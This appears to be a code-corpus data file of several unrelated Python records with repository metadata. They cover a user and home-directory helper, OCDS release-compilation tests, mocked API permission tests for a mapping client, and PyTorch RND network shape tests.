af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
prvsnlib/utils/user.py
|
acoomans/prvsn
|
af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
import os
def real_user():
    """Return the name of the real (pre-sudo) user.

    When running under ``sudo``, SUDO_USER holds the invoking user's name
    and is preferred; otherwise fall back to USER.

    Raises:
        KeyError: if neither SUDO_USER nor USER is set in the environment.
    """
    # Membership test directly on os.environ; calling .keys() was redundant.
    if 'SUDO_USER' in os.environ:
        return os.environ['SUDO_USER']
    return os.environ['USER']
def real_home():
    """Return the current user's home directory from the HOME variable."""
    home = os.environ['HOME']
    return home
| 19.9
| 40
| 0.623116
| 29
| 199
| 4.137931
| 0.448276
| 0.3
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231156
| 199
| 10
| 41
| 19.9
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0.13
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.125
| 0.125
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
1342a61d73dd5792b1607213f40b76b1020cdc73
| 13,252
|
py
|
Python
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T10:17:32.000Z
|
2019-04-11T10:17:32.000Z
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 282
|
2018-12-20T16:49:22.000Z
|
2022-02-01T00:48:10.000Z
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 7
|
2019-04-15T13:36:18.000Z
|
2021-03-02T16:25:41.000Z
|
import datetime
import os
import sqlalchemy as sa
from ocdskingfisherprocess.store import Store
from ocdskingfisherprocess.transform import TRANSFORM_TYPE_COMPILE_RELEASES
from ocdskingfisherprocess.transform.compile_releases import CompileReleasesTransform
from tests.base import BaseDataBaseTest
class TestTransformCompileReleasesFromRecords(BaseDataBaseTest):
def _setup_collections_and_data_run_transform(self, filename, load_a_second_time=False):
# Make source collection
source_collection_id = self.database.get_or_create_collection_id("test", datetime.datetime.now(), False)
source_collection = self.database.get_collection(source_collection_id)
# Load some data
store = Store(self.config, self.database)
store.set_collection(source_collection)
json_filename = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'fixtures', filename
)
store.store_file_from_local("test.json", "http://example.com", "record_package", "utf-8", json_filename)
if load_a_second_time:
store.store_file_from_local("test2.json", "http://example.com", "record_package", "utf-8", json_filename)
# Make destination collection
destination_collection_id = self.database.get_or_create_collection_id(
source_collection.source_id,
source_collection.data_version,
source_collection.sample,
transform_from_collection_id=source_collection_id,
transform_type=TRANSFORM_TYPE_COMPILE_RELEASES)
destination_collection = self.database.get_collection(destination_collection_id)
# transform! Nothing should happen because source is not finished
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Mark source collection as finished
self.database.mark_collection_store_done(source_collection_id)
# transform! This should do the work.
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
return source_collection_id, source_collection, destination_collection_id, destination_collection
def test_compiled_release(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table])\
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'This already had a compiledRelease in the record! It was passed through this transform unchanged.',
]
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_no_compiled_release_linked_records_so_cant_do_anything(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_linked_releases_not_compiled.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 1
assert 'OCID ocds-213czf-000-00001 could not be compiled because at least one release in the releases ' +\
'array is a linked release or there are no releases with dates, ' +\
'and the record has neither a compileRelease nor a release with a tag of "compiled".' == \
notes[0].note
def test_transform_compiles(self):
# This data files has full releases and nothing else, so the transform should compile itself using ocdsmerge
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check we've compiled something here.
# The only way it could get data here is if it compiled it itself.
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table])\
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings is None
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_two_records_same_ocid(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform(
'sample_1_1_record_releases_not_compiled.json',
load_a_second_time=True
)
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table]) \
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'There are multiple records for this OCID! The record to pass through was selected arbitrarily.',
]
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_no_dates(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled_no_dates.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 1
assert 'OCID ocds-213czf-000-00001 could not be compiled ' +\
'because at least one release in the releases array is a ' +\
'linked release or there are no releases with dates, ' +\
'and the record has neither a compileRelease nor a release with a tag of "compiled".' == \
notes[0].note
def test_some_dates(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled_some_dates.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table]) \
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'This OCID had some releases without a date element. We have compiled all other releases.']
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
| 49.081481
| 117
| 0.68118
| 1,595
| 13,252
| 5.408777
| 0.114734
| 0.072331
| 0.046946
| 0.068854
| 0.8252
| 0.815811
| 0.811754
| 0.811754
| 0.811754
| 0.79286
| 0
| 0.025656
| 0.238228
| 13,252
| 269
| 118
| 49.263941
| 0.828925
| 0.111078
| 0
| 0.697143
| 0
| 0
| 0.138439
| 0.055802
| 0
| 0
| 0
| 0
| 0.234286
| 1
| 0.04
| false
| 0.011429
| 0.04
| 0
| 0.091429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1352d01f00a2fe2313cbdfdad47e75d66f994933
| 14,505
|
py
|
Python
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 3
|
2015-10-26T06:38:02.000Z
|
2018-08-17T04:41:10.000Z
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 21
|
2015-07-10T19:24:24.000Z
|
2020-09-22T01:44:20.000Z
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 2
|
2015-08-24T17:47:20.000Z
|
2019-01-16T20:55:40.000Z
|
import pytest
from koordinates import Permission
from koordinates import Client, Group, User
from .response_data.responses_10 import (
layer_list_permissions_good_simulated_response,
layer_permission_simulated_response,
)
from .response_data.responses_10 import (
set_permission_simulated_response,
set_list_permissions_good_simulated_response,
)
from .response_data.responses_10 import (
source_permission_simulated_response,
source_list_permissions_good_simulated_response,
)
from .response_data.sources import source_detail
from .response_data.responses_5 import layers_version_single_good_simulated_response
from .response_data.responses_3 import sets_single_good_simulated_response
# FIXTURES
@pytest.fixture
def responses():
    """Yield an active ``responses.RequestsMock`` for stubbing HTTP requests."""
    # Imported inside the fixture because the fixture name deliberately
    # shadows the 'responses' module for the tests that request it.
    import responses
    with responses.RequestsMock() as rsps:
        yield rsps
@pytest.fixture
def client():
    """Return a Koordinates Client pointed at a dummy test host."""
    test_client = Client(token="test", host="test.koordinates.com")
    return test_client
@pytest.fixture
def layer(responses, client):
    """Yield layer 1474, fetched through a mocked single-layer GET response."""
    responses.add(
        responses.GET,
        client.get_url("LAYER", "GET", "single", {"id": 1474}),
        body=layers_version_single_good_simulated_response,
        status=200,
        content_type="application/json",
    )
    yield client.layers.get(1474)
@pytest.fixture
def set_(responses, client):
    """Yield set 933, fetched through a mocked single-set GET response."""
    # Trailing underscore avoids shadowing the builtin 'set'.
    responses.add(
        responses.GET,
        client.get_url("SET", "GET", "single", {"id": 933}),
        body=sets_single_good_simulated_response,
        status=200,
        content_type="application/json",
    )
    yield client.sets.get(933)
@pytest.fixture
def source(responses, client):
    """Yield source 21836, fetched through a mocked single-source GET response."""
    responses.add(
        responses.GET,
        client.get_url("SOURCE", "GET", "single", {"id": 21836}),
        body=source_detail,
        status=200,
        content_type="application/json",
    )
    yield client.sources.get(21836)
# TESTS
def test_list_layer_permissions(responses, client, layer):
    """Listing layer permissions yields exactly one 'download' entry for Everyone."""
    single_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
    perms_url = single_url + client.get_url_path("PERMISSION", "GET", "multi")
    responses.add(
        responses.GET,
        perms_url,
        body=layer_list_permissions_good_simulated_response,
        status=200,
        content_type="application/json",
    )
    seen = 0
    for permission in layer.permissions.list():
        assert isinstance(permission, Permission)
        assert isinstance(permission.group, Group)
        assert permission.permission == "download"
        assert permission.id == "group.everyone"
        assert permission.group.id == 4
        assert permission.group.name == "Everyone"
        assert permission.group.url == "https://test.koordinates.com/services/api/v1/groups/4/"
        seen += 1
    assert seen == 1
def test_create_layer_permission(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
responses.add(
responses.POST,
target_url,
body=layer_permission_simulated_response,
status=201,
adding_headers={
"Location": "https://test.koordinates.com/services/api/v1/layers/%s/permissions/%s/"
% (layer.id, "108")
},
)
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 108}
)
responses.add(
responses.GET, target_url, body=layer_permission_simulated_response, status=200
)
permission = Permission()
permission.group = "108"
permission.permission = "download"
response = layer.permissions.create(permission)
assert response.id == permission.id
assert response.permission == permission.permission
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 108 == permission.group.id
def test_set_layer_permissions(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "PUT", "multi")
responses.add(
responses.PUT,
target_url,
body=layer_list_permissions_good_simulated_response,
status=201,
)
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=layer_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
data = [{"permission": "download", "group": "everyone"}]
for obj in layer.permissions.set(data):
assert isinstance(obj, Permission)
assert isinstance(obj.group, Group)
assert obj.permission == "download"
assert obj.id == "group.everyone"
def test_get_layer_permission(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 108}
)
responses.add(
responses.GET, target_url, body=layer_permission_simulated_response, status=200
)
response = layer.permissions.get(108)
assert response.id == "group.108"
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 108 == response.group.id
def test_list_set_permissions(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=set_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
cnt_permissions_returned = 0
for obj in set_.permissions.list():
assert isinstance(obj, Permission)
assert obj.permission in ["admin", "view"]
if obj.group:
assert isinstance(obj.group, Group)
assert (
obj.group.url
== "https://test.koordinates.com/services/api/v1/groups/%s/"
% obj.group.id
)
elif obj.user:
assert isinstance(obj.user, User)
assert (
obj.user.url
== "https://test.koordinates.com/services/api/v1/users/%s/"
% obj.user.id
)
cnt_permissions_returned += 1
assert cnt_permissions_returned == 3
def test_create_set_permission(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
responses.add(
responses.POST,
target_url,
body=set_permission_simulated_response,
status=201,
adding_headers={
"Location": "https://test.koordinates.com/services/api/v1/sets/%s/permissions/%s/"
% (set_.id, "34")
},
)
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 34}
)
responses.add(
responses.GET, target_url, body=set_permission_simulated_response, status=200
)
permission = Permission()
permission.group = "34"
permission.permission = "edit"
response = set_.permissions.create(permission)
assert response.id == permission.id
assert response.permission == permission.permission
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 34 == permission.group.id
def test_set_set_permissions(responses, client, set_):
    """PUTting a full permission list on a set returns the updated list."""
    base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
    responses.add(
        responses.PUT,
        base_url + client.get_url_path("PERMISSION", "PUT", "multi"),
        body=set_list_permissions_good_simulated_response,
        status=201,
    )
    base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
    responses.add(
        responses.GET,
        base_url + client.get_url_path("PERMISSION", "GET", "multi"),
        body=set_list_permissions_good_simulated_response,
        status=200,
        content_type="application/json",
    )
    data = [
        {"permission": "admin", "user": "4"},
        {"permission": "admin", "group": "administrators"},
        {"permission": "view", "group": "everyone"},
    ]
    seen = 0
    for perm in set_.permissions.set(data):
        seen += 1
        # Each returned entry is a Permission tied to a group or a user.
        assert isinstance(perm, Permission)
        assert perm.permission in ["admin", "view"]
        if perm.group:
            assert isinstance(perm.group, Group)
            assert perm.group.url == (
                "https://test.koordinates.com/services/api/v1/groups/%s/"
                % perm.group.id
            )
        elif perm.user:
            assert isinstance(perm.user, User)
            assert perm.user.url == (
                "https://test.koordinates.com/services/api/v1/users/%s/"
                % perm.user.id
            )
    assert seen == 3
def test_get_set_permission(responses, client, set_):
    """Fetching one set permission by id deserializes the group details."""
    url = client.get_url("SET", "GET", "single", {"id": set_.id})
    url += client.get_url_path("PERMISSION", "GET", "single", {"permission_id": 34})
    responses.add(
        responses.GET, url, body=set_permission_simulated_response, status=200
    )
    result = set_.permissions.get(34)
    assert isinstance(result, Permission)
    assert result.id == "group.34"
    assert isinstance(result.group, Group)
    assert result.group.id == 34
def test_list_source_permissions(responses, client, source):
    """Listing a source's permissions yields hydrated Permission objects."""
    base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
    responses.add(
        responses.GET,
        target_url,
        body=source_list_permissions_good_simulated_response,
        status=200,
        content_type="application/json",
    )

    def _check(perm):
        # Every entry is a Permission granted to either a group or a user.
        assert isinstance(perm, Permission)
        assert perm.permission in ["admin", "view"]
        if perm.group:
            assert isinstance(perm.group, Group)
            assert perm.group.url == (
                "https://test.koordinates.com/services/api/v1/groups/%s/"
                % perm.group.id
            )
        elif perm.user:
            assert isinstance(perm.user, User)
            assert perm.user.url == (
                "https://test.koordinates.com/services/api/v1/users/%s/"
                % perm.user.id
            )

    results = [p for p in source.permissions.list()]
    for perm in results:
        _check(perm)
    assert len(results) == 3
def test_create_source_permission(responses, client, source):
    """POSTing a new permission on a source returns the created Permission.

    The mocked POST answers with a Location header; the client is expected
    to follow it, so the matching GET is mocked as well.
    """
    base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
    responses.add(
        responses.POST,
        target_url,
        body=source_permission_simulated_response,
        status=201,
        adding_headers={
            "Location": "https://test.koordinates.com/services/api/v1/sources/%s/permissions/%s/"
            % (source.id, "85")
        },
    )
    # Mock the GET for the resource the Location header points at.
    base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    target_url = base_url + client.get_url_path(
        "PERMISSION", "GET", "single", {"permission_id": 85}
    )
    responses.add(
        responses.GET, target_url, body=source_permission_simulated_response, status=200
    )
    permission = Permission()
    permission.group = "85"
    permission.permission = "download"
    response = source.permissions.create(permission)
    # NOTE(review): the assertions below compare against / inspect
    # ``permission`` (the request object), which relies on create()
    # updating its argument in place — confirm against the client code.
    assert response.id == permission.id
    assert response.permission == permission.permission
    assert isinstance(response, Permission)
    assert isinstance(response.group, Group)
    assert 85 == permission.group.id
def test_source_set_permissions(responses, client, source):
    """PUTting a full permission list on a source returns the updated list."""
    base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    responses.add(
        responses.PUT,
        base_url + client.get_url_path("PERMISSION", "PUT", "multi"),
        body=source_list_permissions_good_simulated_response,
        status=201,
    )
    base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    responses.add(
        responses.GET,
        base_url + client.get_url_path("PERMISSION", "GET", "multi"),
        body=source_list_permissions_good_simulated_response,
        status=200,
        content_type="application/json",
    )
    data = [
        {"permission": "admin", "user": "4"},
        {"permission": "admin", "group": "administrators"},
        {"permission": "view", "group": "everyone"},
    ]
    seen = 0
    for perm in source.permissions.set(data):
        seen += 1
        # Each returned entry is a Permission tied to a group or a user.
        assert isinstance(perm, Permission)
        assert perm.permission in ["admin", "view"]
        if perm.group:
            assert isinstance(perm.group, Group)
            assert perm.group.url == (
                "https://test.koordinates.com/services/api/v1/groups/%s/"
                % perm.group.id
            )
        elif perm.user:
            assert isinstance(perm.user, User)
            assert perm.user.url == (
                "https://test.koordinates.com/services/api/v1/users/%s/"
                % perm.user.id
            )
    assert seen == 3
def test_source_layer_permission(responses, client, source):
    """Fetching one source permission by id deserializes the group details.

    NOTE(review): the name says "layer" but the body targets source
    permissions — looks like a copy/paste slip; name kept so existing
    pytest selections keep working.
    """
    url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
    url += client.get_url_path("PERMISSION", "GET", "single", {"permission_id": 85})
    responses.add(
        responses.GET, url, body=source_permission_simulated_response, status=200
    )
    result = source.permissions.get(85)
    assert isinstance(result, Permission)
    assert result.id == "group.85"
    assert isinstance(result.group, Group)
    assert result.group.id == 85
| 32.449664
| 97
| 0.635781
| 1,666
| 14,505
| 5.321729
| 0.057023
| 0.039589
| 0.052786
| 0.064967
| 0.886533
| 0.877848
| 0.850214
| 0.838033
| 0.804196
| 0.773066
| 0
| 0.016484
| 0.238814
| 14,505
| 446
| 98
| 32.522422
| 0.786523
| 0.000965
| 0
| 0.66756
| 0
| 0.008043
| 0.136251
| 0
| 0
| 0
| 0
| 0
| 0.179625
| 1
| 0.045576
| false
| 0
| 0.02681
| 0.002681
| 0.075067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1355244f7bcee410d7a117b37ae3ee7f333497ba
| 49
|
py
|
Python
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | 8
|
2015-04-09T01:03:12.000Z
|
2020-12-18T10:38:37.000Z
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | 2
|
2015-04-09T01:07:10.000Z
|
2016-12-02T01:07:23.000Z
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from .parser import parse
| 12.25
| 25
| 0.734694
| 8
| 49
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 3
| 26
| 16.333333
| 0.857143
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13b34d335bbed7d7adacbb3f468e30f1e9391c74
| 2,021
|
py
|
Python
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 300
|
2021-11-03T07:06:34.000Z
|
2022-03-24T02:23:56.000Z
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 37
|
2021-11-04T04:31:07.000Z
|
2022-03-30T01:40:49.000Z
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 45
|
2021-11-03T08:05:56.000Z
|
2022-03-24T08:35:05.000Z
|
import torch
from core.network.rnd import RND_MLP, RND_CNN, RND_Multi
def test_rnd_mlp_call():
    """RND_MLP forward returns shape (batch, 1) in both update_ri modes."""
    D_in, D_out, D_hidden = 2, 3, 4
    num_workers, gamma_i = 2, 0.99
    net = RND_MLP(
        D_in=D_in,
        D_out=D_out,
        D_hidden=D_hidden,
        num_workers=num_workers,
        gamma_i=gamma_i,
    )
    batch_size = 5

    # update_ri=True path: batch carries one sample per worker.
    out = net(torch.rand((batch_size * num_workers, D_in)), update_ri=True)
    assert out.shape == (batch_size * num_workers, 1)

    # update_ri=False path: plain batch.
    out = net(torch.rand((batch_size, D_in)), update_ri=False)
    assert out.shape == (batch_size, 1)
def test_rnd_cnn_call():
    """RND_CNN forward returns shape (batch, 1) in both update_ri modes."""
    D_in, D_out, D_hidden = [3, 36, 36], 3, 4
    num_workers, gamma_i = 2, 0.99
    net = RND_CNN(
        D_in=D_in,
        D_out=D_out,
        D_hidden=D_hidden,
        num_workers=num_workers,
        gamma_i=gamma_i,
    )
    batch_size = 5

    # update_ri=True path: batch carries one observation per worker.
    out = net(torch.rand((batch_size * num_workers, *D_in)), update_ri=True)
    assert out.shape == (batch_size * num_workers, 1)

    # update_ri=False path: plain batch.
    out = net(torch.rand((batch_size, *D_in)), update_ri=False)
    assert out.shape == (batch_size, 1)
def test_rnd_multi_call():
    """RND_Multi takes an [image, vector] pair and returns shape (batch, 1)."""
    D_in, D_out, D_hidden = [[3, 36, 36], 2], 3, 4
    num_workers, gamma_i = 2, 0.99
    net = RND_Multi(
        D_in=D_in,
        D_out=D_out,
        D_hidden=D_hidden,
        num_workers=num_workers,
        gamma_i=gamma_i,
    )
    batch_size = 5
    big = batch_size * num_workers

    # update_ri=True path: one [image, vector] sample per worker.
    out = net(
        [torch.rand((big, *D_in[0])), torch.rand((big, D_in[1]))],
        update_ri=True,
    )
    assert out.shape == (big, 1)

    # update_ri=False path: plain batch.
    out = net(
        [torch.rand((batch_size, *D_in[0])), torch.rand((batch_size, D_in[1]))],
        update_ri=False,
    )
    assert out.shape == (batch_size, 1)
| 22.965909
| 80
| 0.584859
| 315
| 2,021
| 3.403175
| 0.126984
| 0.047575
| 0.033582
| 0.134328
| 0.918843
| 0.918843
| 0.918843
| 0.883396
| 0.857276
| 0.849813
| 0
| 0.029758
| 0.285007
| 2,021
| 87
| 81
| 23.229885
| 0.712111
| 0
| 0
| 0.573529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.044118
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
13b4619f8f8fc3e569b787d7c4a8007a329fd8ac
| 617
|
py
|
Python
|
data_prep_scripts/openslr_pre_manifest.py
|
jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 8
|
2021-12-11T12:26:20.000Z
|
2022-03-22T13:38:42.000Z
|
data_prep_scripts/openslr_pre_manifest.py
|
jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 15
|
2022-01-08T11:59:49.000Z
|
2022-03-26T15:52:36.000Z
|
data_prep_scripts/openslr_pre_manifest.py
|
